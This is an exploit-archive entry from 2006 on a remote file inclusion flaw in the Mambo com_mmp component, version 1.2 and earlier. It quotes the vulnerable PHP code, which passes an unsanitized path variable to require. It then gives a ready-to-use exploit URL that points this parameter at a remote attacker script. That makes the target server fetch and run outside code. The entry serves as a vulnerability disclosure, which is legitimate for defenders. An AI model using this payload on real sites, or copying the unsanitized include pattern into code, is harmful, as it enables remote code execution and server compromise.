Mambo mmp Component <= 1.2 Remote File Include Vulnerability

2006-08-14T00:00:00
ID 1337DAY-ID-690
Type zdt
Reporter mdx
Modified 2006-08-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Mambo mmp Component <= 1.2 Remote File Include Vulnerability
============================================================



####################################################
#                                                  #
#         C Y BE R - W A R R i O R   T I M         #
#                                                  #
####################################################

mambo com_mmp Component (mosConfig_absolute_path) Remote File Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote


####################################################

Code: help.mmp.php?, line 12

<?php
       global $mosConfig_absolute_path;
       require $mosConfig_absolute_path .
"/administrator/components/com_mmp/diagnostics.mmp.php";
       diagnostics();
?>

Exploit:
http://www.site.com/[path]/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

####################################################

Greetz: Cyber-warrior TIM USERS and xoron

####################################################




#  0day.today [2018-03-17]  #